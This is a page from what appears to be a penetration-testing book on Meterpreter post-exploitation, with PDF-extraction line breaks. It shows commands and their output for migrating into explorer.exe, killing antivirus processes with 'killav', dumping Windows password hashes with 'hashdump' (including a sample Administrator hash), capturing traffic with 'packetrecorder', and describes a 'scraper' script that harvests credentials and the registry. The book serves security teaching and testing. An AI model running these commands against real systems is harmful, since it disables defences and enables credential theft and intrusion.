Meterpreter

93

[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

Killing Antivirus Software

Antivirus software can block certain tasks. During penetration tests, we have 
seen “smarter” antivirus or host-based intrusion prevention products block 
our ability to run certain attack vectors. In such cases, we can run the 

killav

 

script to stop the processes preventing our tasks from running.

meterpreter > 

run killav

[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...

Obtaining System Password Hashes

Obtaining a copy of the system’s password hashes allows us to run pass-the-
hash attacks or to brute force the hash to reveal the plain-text password. We 
can obtain the password hashes with the 

run hashdump

 command:

meterpreter > 

run hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::

Viewing All Traffic on a Target Machine

To see all traffic on a target, we can run a packet recorder. Everything cap-
tured by 

packetrecorder

 is saved in the 

.pcap

 file format to be parsed with a 

tool such as Wireshark.

In this listing, we run the 

packetrecorder

 script with the

 -i 1

 option, which 

specifies which interface we want to use to perform the packet captures:

meterpreter > 

run packetrecorder -i 1

[*] Starting Packet capture on interface 1
[*] Packet capture started

Scraping a System

The 

scraper

 script enumerates just about everything you could ever want 

from a system. It will grab the usernames and passwords, download the entire 
registry, dump password hashes, gather system information, and export the 

HKEY_CURRENT_USER

 (

HKCU

).